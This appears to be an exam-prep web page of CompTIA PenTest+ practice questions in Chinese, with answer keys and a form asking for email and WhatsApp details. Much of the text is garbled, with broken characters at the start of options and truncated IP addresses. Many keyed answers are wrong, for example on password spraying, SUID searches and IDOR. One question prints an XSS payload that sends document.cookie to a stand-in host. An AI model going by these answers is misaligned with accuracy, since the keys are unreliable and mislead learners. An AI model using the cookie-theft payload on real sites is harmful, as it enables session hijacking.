CompTIA PT0-002 認證考試問題與答案, CompTIA PenTest+ 認證 | SPOTO

利用我們全面的學習資源準備 CompTIA PenTest+ (PT0-002) 認證考試。備考的最佳方法是練習最新的考試試題。我們的學習材料包括模擬測試、樣題、考試試卷以及考試問題和答案，幫助您建立信心，做好準備。CompTIA PenTest+ 認證專爲負責滲透測試和漏洞管理的網絡安全專業人員設計。利用我們的考試材料和考試答案，您可以加強對關鍵概念的理解，提高備考水平。我們的模擬考試和考試模擬器可提供真實的考試體驗，模擬考試條件，增強您的信心。利用我們的考試材料和考試答案，確保您做好充分準備，成功通過 PT0-002 考試，獲得 CompTIA PenTest+ 認證。

參加其他線上考試

問題 #1

客戶在評估一家滲透測試公司時，要求提供其工作實例。以下哪項是滲透測試人員的最佳行動方案？

A. ��改身份信息並提供以前客戶的文件。

B. ��允許客戶在安全空間內查看信息。

C. ��定哪些報告不再處於保密期。

D. ��供滲透測試工具的原始輸出。

查看答案

正確答案: A

問題 #2

在評估過程中，滲透測試人員通過抓取目標公司的網站獲取了 30 個電子郵件地址列表，然後根據電子郵件地址格式創建了一個可能的用戶名列表。以下哪種類型的攻擊最有可能被用來避免賬戶鎖定？

A. ��罩

B. ��虹

C. ��典

D. ��碼噴塗

查看答案

正確答案: C

問題 #3

滲透測試人員以用戶身份登錄某公司的雲環境。以下哪個 Pacu 模塊能讓測試人員確定現有用戶的訪問級別？

A. iam_enum_permissions

B. iam_privesc_scan

C. iam_backdoor_assume_role

D. iam_bruteforce_permissions

查看答案

正確答案: D

問題 #4

一名滲透測試人員入侵了一臺網絡服務器，並橫向進入了一臺 Linux 網絡服務器。測試人員現在想確定最後登錄網絡服務器的用戶身份。以下哪個日誌文件會顯示此活動？

A. var/log/messages

B. var/log/last_user

C. var/log/user_log

D. var/log/lastlog

查看答案

正確答案: A

問題 #5

Nmap 網絡掃描發現了五個開放端口和已識別的服務。滲透測試人員應使用以下哪種工具確定開放端口是否存在漏洞及相關漏洞利用？

A. penVAS

B. rozer

C. ��嗝套間

D. WASP ZAP

查看答案

正確答案: C

問題 #6

以下哪種評估方法最有可能對綜合監控系統環境造成危害？

A. ��動掃描

B. ��掃

C. ��議逆轉

D. ��據包分析

查看答案

正確答案: A

問題 #7

滲透測試小組正在進行物理滲透測試，以進入一棟大樓。以下哪項是滲透測試人員應隨身攜帶參與文件副本的原因？

A. ��爲原件丟失時的備份

B. ��導他們通過大樓入口

C. ��客戶驗證賬單信息

D. ��爲萬一被發現的證據

查看答案

正確答案: C

問題 #8

滲透測試人員在一臺計算機上運行 unshadow 命令。測試人員下一步最有可能使用以下哪種工具？

A. ��膛手約翰

B. ��螅

C. ��米卡茲

D. ��隱和亞伯

查看答案

正確答案: C

問題 #9

滲透測試人員在網絡應用程序測試期間捕獲了以下流量：測試人員應使用以下哪種方法來可視化正在傳輸的授權信息？

A. ��用 UTF-8 解碼授權標頭。

B. ��用 bcrypt 解密授權頭。

C. ��用 Base64 解碼授權標頭。

D. ��用 AES 對授權標頭進行解密。

查看答案

正確答案: D

問題 #10

滲透測試人員希望在特定域的網絡文檔中找到隱藏信息。滲透測試人員應該使用以下哪種方法？

A. etcraft

B. ��央運行中心

C. ��答者

D. ��非論壇

查看答案

正確答案: A

問題 #11

滲透測試人員發現某客戶使用雲郵件作爲公司的電子郵件系統。在滲透測試過程中，測試人員設置了一個虛假的雲郵件登錄頁面，並向公司所有員工發送了一封電子郵件，指出他們的收件箱已滿，並引導他們訪問虛假的登錄頁面來解決問題。以下哪項最恰當地描述了這次攻擊？

A. ��證獲取

B. ��限升級

C. ��碼噴塗

D. ��名記錄濫用

查看答案

正確答案: C

問題 #12

滲透測試人員在一個未受保護的內部源代碼庫中發現了一個網絡應用程序使用的 PHP 腳本。在查看代碼後，測試人員發現了以下問題：滲透測試人員將使用以下哪種工具組合來利用該腳本？

A. ��螅和緊縮

B. etcat 和 cURL

C. ��嗝套件和 DIRB

D. map 和 OWASP ZAP

查看答案

正確答案: A

問題 #13

以下哪項是驗證滲透測試結果的最有效方法？

A. ��三方

B. ��長

C. ��席信息官

D. ��戶

查看答案

正確答案: CE

問題 #14

滲透測試人員在系統上運行以下命令： find / -user root -perm -4000 -print 2>/dev/null 測試人員試圖完成以下哪項工作？

A. �� / 目錄中的所有文件設置 SGID

B. ��找系統中的 /root 目錄

C. ��找設置了 SUID 位的文件

D. ��找開發過程中創建的文件，並將其移至 /dev/null

查看答案

正確答案: A

問題 #15

一名安全分析人員需要通過 16 網絡對 SMB 端口 445 執行掃描。在不考慮隱蔽性且任務時間緊迫的情況下，以下哪個命令是最佳選擇？

A. map -s 445 -Pn -T5 172

B. map -p 445 -n -T4 -open 172

C. map -sV --script=smb* 172

D. map -p 445 -max -sT 172

查看答案

正確答案: D

問題 #16

一名測試人員在執行滲透測試時發現了一個較舊的防火牆，已知該防火牆存在嚴重的遠程攻擊漏洞，但並不在參與測試的原始 IP 地址列表中。以下哪項是測試人員的最佳選擇？

A. ��防火牆與雲隔離。

B. ��描防火牆，查找漏洞。

C. ��知客戶有關防火牆的信息。

D. ��防火牆打補丁。

查看答案

正確答案: A

問題 #17

滲透測試人員已經確定了路徑上的攻擊位置，現在必須專門製作一個 DNS 查詢響應，並將其發送回目標主機。以下哪種實用程序能最好地支持這一目標？

A. ��卡特

B. tcpdump

C. ��卡皮

D. 挖掘

查看答案

正確答案: C

問題 #18

在應用程序代碼中使用第三方開放源代碼庫的最大顧慮是什麼？(請選擇兩項）。

A. ��書館可能易受攻擊

B. ��件使用許可含糊不清

C. ��何人都可以讀取這些庫的代碼庫

D. ��碼來源不明

E. ��書館可能沒有支持

F. ��書館可能會破壞應用程序

查看答案

正確答案: AC

問題 #19

以下哪項是獲取針對特定網絡基礎設施產品的有效載荷的最佳資源？

A. xploit-DB

B. etasploit

C. ��丹

D. ��網膜

查看答案

正確答案: A

問題 #20

一名滲透測試人員正在查找一個漏洞，該漏洞可使攻擊者通過用於物理訪問控制系統的專門 TCP 服務打開大門。該服務存在於 100 多臺不同的主機上，因此測試人員希望自動進行評估。識別要求滲透測試人員建立完整的 TCP 連接發送 "hello "有效負載等待響應發送長度超過 16 字節的字符串以下哪種方法能最好地實現目標

A. ��行 nmap -Pn -sV -script vuln

B. ��主機的 TCP 端口進行 OpenVAS 簡單掃描。

C. �� Lua 語言創建腳本並與 NSE 一起使用。

D. ��用 Nessus 執行憑證掃描。

查看答案

正確答案: B

問題 #21

以下哪份文檔是與滲透測試工作相關的各方一致同意的，並定義了範圍、聯繫人、成本、持續時間和交付成果？

A. ��作計劃

B. ��務級協議

C. ��理事務協議

D. DA

查看答案

正確答案: B

問題 #22

一名滲透測試人員正在測試公司現有服務的新 API，並準備了以下腳本：測試會發現以下哪些情況？

A. ��認網絡配置

B. ��開主機上的網絡端口

C. ��持的 HTTP 方法

D. ��中的監聽網絡服務器

查看答案

正確答案: D

問題 #23

滲透測試人員在一臺主機上成功實施了漏洞攻擊，並從 VLAN 100 跳轉到 VLAN 200。VLAN 200 包含執行金融交易的服務器，滲透測試人員現在希望攻擊機器的本地接口在本地緩存中擁有一個靜態 ARP 條目。攻擊機器的情況如下：IP 地址： 192.168.1.63 物理地址：60-36-dd-a6-c5-33 滲透測試人員最有可能使用以下哪些命令來建立靜態 ARP 條目？

A. tcpdump -i eth01 arp 和 arp[6:2] == 2

B. arp -s 192

C. ipconfig /all findstr /v 00-00-00 | findstr Physical

D. 路由添加 192

查看答案

正確答案: D

問題 #24

漏洞開發人員正在編寫一個腳本，向網絡服務器提交大量的小請求，直到服務器被攻破。腳本必須檢查收到的每個響應，並將數據與大量字符串進行比較，以確定下一步提交哪些數據。開發人員應使用以下哪種數據結構來儘可能高效地進行字符串比較和確定？

A. ��單

B. ��棵樹

C. ��典

D. ��組

查看答案

正確答案: CD

問題 #25

滲透測試人員從 Nmap 掃描中得到以下結果：目標最有可能運行以下哪個操作系統？

A. entOS

B. rch Linux

C. ��窗服務器

D. ��班圖

查看答案

正確答案: C

問題 #26

滲透測試人員從被入侵的網絡服務器下載了一個 Java 應用程序文件，並通過查看以下日誌確定了如何調用該文件：要驗證 Java 應用程序是否使用了套接字加密，滲透測試人員需要按照以下哪個步驟的順序進行操作？

A. ��行應用程序漏洞掃描，然後確定應用程序使用的 TCP 端口。

B. ��行連接到調試器的應用程序，然後查看應用程序的日誌。

C. ��匯編二進制代碼，然後確定斷點。

D. ��用 Wireshark 啓動數據包捕獲，然後運行應用程序。

查看答案

正確答案: C

問題 #27

一名滲透測試人員在與客戶接洽之前正在審閱以下 SOW："網絡圖、邏輯和物理資產清單以及員工姓名應視爲客戶機密。任務完成後，滲透測試人員將通過加密協議向客戶的首席信息安全官 (CISO) 提交調查結果，隨後以安全的方式刪除所有調查結果。根據 SOW 中的信息，下列行爲中的哪一項是

A. ��用不向公衆或客戶提供的專有滲透測試工具進行審計和檢查

B. ��用公用密鑰加密技術，確保在參與工作完成後向首席信息安全官提交調查結果

C. ��了討好客戶的高層領導團隊，不與客戶分享客戶架構中存在的關鍵漏洞

D. ��過共享客戶的公共 IP 地址，在地下黑客論壇上尋求參與幫助

E. ��用基於軟件的清除工具，從滲透測試人員的筆記本電腦上清除客戶的調查結果

F. �� SOW 保留在滲透測試人員的公司內部，以備將來使用，這樣銷售團隊就能規劃未來的業務約定

查看答案

正確答案: C

問題 #28

滲透測試人員正在開始一項評估，但只有目標公司的公開信息。客戶知道這項工作，正在爲測試做準備。以下哪項描述了評估的範圍？

A. ��分已知環境測試

B. ��知環境測試

C. ��知環境測試

D. ��理環境測試

查看答案

正確答案: D

問題 #29

在滲透測試過程中，測試人員能夠將 example.com/login.php?id=5 的 URL 值更改爲 example.com/login.php?id=10，從而訪問網絡應用程序。滲透測試人員利用了以下哪些漏洞？

A. ��令注入

B. ��證失效

C. ��接對象參照

D. ��站腳本

查看答案

正確答案: A

問題 #30

滲透測試人員與客戶之間必須籤署以下哪份文件，以管理在業務約定之前、期間和之後如何管理所提供的任何信息？

A. ��理事務協議

B. DA

C. OW

D. ��資回報率

查看答案

正確答案: C

問題 #31

以應用程序開發人員團隊爲目標受衆編寫的靜態應用程序安全測試最終報告最有可能包含以下哪項內容？

A. ��用滲透測試方法執行摘要

B. ��料清單，包括用品、分包合同和評估過程中產生的費用

C. ��功入侵軟件的定量影響評估

D. ��安全類型轉換操作實例的代碼上下文

查看答案

正確答案: B

問題 #32

以下哪項最恰當地描述了客戶與滲透測試團隊召開經驗教訓總結會的原因？

A. ��報告結構提供反饋意見並提出改進建議

B. ��論調查結果，並對任何誤報提出異議

C. ��定評估過程中未達到預期目標的流程

D. ��保滲透測試團隊銷毀測試期間收集的所有公司數據

查看答案

正確答案: A

問題 #33

給出以下代碼：var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;以下哪種方法是防範此類攻擊的最佳方法？(選擇兩個）。

A. ��絡應用防火牆

B. ��數化查詢

C. ��出編碼

D. ��話令牌

E. ��入驗證

F. ase64 編碼

查看答案

正確答案: B

問題 #34

在一個未受保護的網絡文件庫中，滲透測試人員發現了一個包含明文用戶名和密碼的文本文件，以及一個包含 50 名員工數據（包括全名、角色和序列號）的電子表格。測試人員發現文本文件中的部分密碼格式如下<姓名-序列號>。以下哪項是測試人員利用這些信息採取 NEXT 的最佳行動？

A. ��建自定義密碼字典，爲密碼噴射測試做準備。

B. ��議使用密碼管理器/保險庫來安全存儲密碼，而不是文本文件。

C. ��議在所有系統和應用程序中配置密碼複雜性規則。

D. ��滲透測試報告中將未受保護的文件庫記錄爲一項發現。

查看答案

正確答案: B

問題 #35

一家安全公司受聘執行一項範圍廣泛的內部威脅評估，試圖進入存放 PII 和工資數據的人力資源服務器。滲透測試人員獲得了一個內部網絡起始位置。如果執行以下哪些行動，屬於評估範圍內的道德行爲？

A. ��用 SQL 數據庫的配置弱點

B. ��截出站 TLS 流量

C. ��過向企業級更新服務器注入惡意軟件來訪問主機

D. ��用內部 CA 的漏洞籤發虛假客戶證書

E. ��域控制器上建立和維護持久性

查看答案

正確答案: A

問題 #36

滲透測試人員正在沙盒環境中測試新版移動應用程序。爲了攔截和解密應用程序與外部應用程序接口之間的流量，測試人員創建了一個私有根 CA 並從中簽發了證書。儘管測試人員已將根 CA 安裝到用於測試的智能手機的 "可信石 "中，但應用程序仍顯示錯誤，表明證書不匹配，並且無法連接到服務器。以下哪項最有可能是造成這種情況的原因？

A. ��火牆上的 TCP 443 端口未打開

B. ��用程序接口服務器使用的是 SSL 而不是 TLS

C. ��試人員使用的是過時的應用程序版本

D. ��用程序已鎖定 API 證書。

查看答案

正確答案: A

問題 #37

對網絡交換機進行 Nmap 掃描後發現以下問題：以下哪種技術控制最有可能成爲該設備的首選建議？

A. ��密密碼

B. ��統硬化技術

C. ��因素身份驗證

D. ��絡分段

查看答案

正確答案: B

問題 #38

一名安全工程師在網絡上發現了一臺新服務器，他想掃描這臺主機，以確定它運行的是否是經批准的 Linux 版本和已打補丁的 Apache 版本。下面哪個命令可以完成這項任務？

A. nmap -f -sV -p80 192

B. nmap -sS -sL -p80 192

C. nmap -A -T4 -p80 192

D. nmap -O -v -p80 192

查看答案

正確答案: B

提交後看答案

請提交您的電子郵件和WhatsApp以獲取問題的答案。

注意：請確保您的電子郵件 ID 和 Whatsapp 有效，以便您獲得正確的考試結果。

電子郵件:

WhatsApp/電話號碼:

不想錯過任何事？

100%通過的Cisco、PMP、CISA、CISM、AWS模擬測試現已發售！
立即獲取

CompTIA PT0-002 認證考試問題與答案, CompTIA PenTest+ 認證 | SPOTO

提交後看答案

不想錯過任何事？

100%通過的Cisco、PMP、CISA、CISM、AWS模擬測試現已發售！ 立即獲取

CompTIA PT0-002 認證考試問題與答案, CompTIA PenTest+ 認證 | SPOTO

提交後看答案

100%通過的Cisco、PMP、CISA、CISM、AWS模擬測試現已發售！
立即獲取